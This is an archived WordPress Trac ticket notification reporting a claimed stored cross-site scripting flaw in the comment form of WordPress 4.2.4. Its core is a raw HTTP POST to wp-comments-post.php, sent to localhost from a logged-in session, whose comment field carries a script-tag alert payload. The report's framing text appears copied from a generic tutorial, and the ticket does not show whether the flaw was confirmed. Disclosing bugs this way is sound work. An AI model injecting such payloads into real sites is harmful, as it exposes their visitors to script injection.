[wp-trac] [WordPress Trac] #33402: Zero Day on the Comment section on latest wordpess release
WordPress Trac
noreply at wordpress.org
Tue Aug 18 08:45:37 UTC 2015
#33402: Zero Day on the Comment section on latest wordpess release
--------------------------+-----------------------------
Reporter: 3ntr0py | Owner:
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: Security | Version: 4.2.4
Severity: normal | Keywords:
Focuses: |
--------------------------+-----------------------------
I found the Stored XSS on the comment section on wordpress.
Stored Cross-site Scripting (XSS) is the most dangerous type of Cross Site
Scripting. Web applications that allow users to store data are potentially
exposed to this type of attack. This chapter illustrates examples of
stored cross site scripting injection and related exploitation scenarios.
Post Request I sent was:
POST /wordpress/wp-comments-post.php HTTP/1.1
Host: localhost
Content-Length: 162
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/33.0.1750.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/wordpress/index.php/2015/08/17/hello-world/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=mmssbonu21%7C1440022264%7CYQQOLOtHYDiOWcY530mQphmeXi9RIx7DkSLh8kdqZZ4%7Cf611a27ebe5fd565b39e3bfff8ee680e8206219a14ccfdae75547f9d293c0025;
wp-settings-time-1=1439881779
comment=testing11a6f<script>alert(1)<%2fscript>2f4c9&submit=Post+Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=556b24f545&_wp_unfiltered_html_comment=5753622fd1&ak_js=1439881790623
--
Ticket URL: <https://core.trac.wordpress.org/ticket/33402>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list